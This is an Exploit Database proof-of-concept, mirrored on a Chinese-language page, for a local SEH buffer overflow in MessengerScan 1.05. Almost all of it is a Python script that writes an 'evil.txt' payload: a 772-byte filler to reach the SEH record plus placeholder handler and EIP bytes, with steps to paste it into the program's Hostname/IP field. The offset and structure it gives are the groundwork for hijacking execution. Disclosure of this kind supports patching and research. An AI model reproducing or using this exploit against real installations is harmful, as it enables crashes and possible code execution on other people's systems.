MessengerScan 1.05 – Local Buffer Overflow (PoC)

• Exploit Database
• 116 阅读

• 作者： Anurag Srivastava
  日期： 2017-08-18
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42495/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  #!/usr/bin/python # Exploit Title : MessengerScan v1.05 Hostname/IP Field SEH/EIP Overwrite POC # Discovery by: Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Discovery Date: 18/08/2017 # Software Link : https://www.mcafee.com/in/downloads/free-tools/messengerscan.aspx# # Tested Version: 1.05 # Vulnerability Type: SEH Overwrite POC # Tested on OS: Windows 7 Ultimate x64bit # Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press -> ########################################################################################## #-----------------------------------NOTES----------------------------------------------# ########################################################################################## #SEH chain of main thread #AddressSE handler #42424242 *** CORRUPT ENTRY ***   # Offset to the SEH is 772 buffer = "A"*772 # Address to the Handler Code seh = "B"*4 #Junk junk = "C"*12 # Address to the EIP eip = "D"*4 f = open("evil.txt", "wb") f.write(buffer+seh+junk+eip) f.close()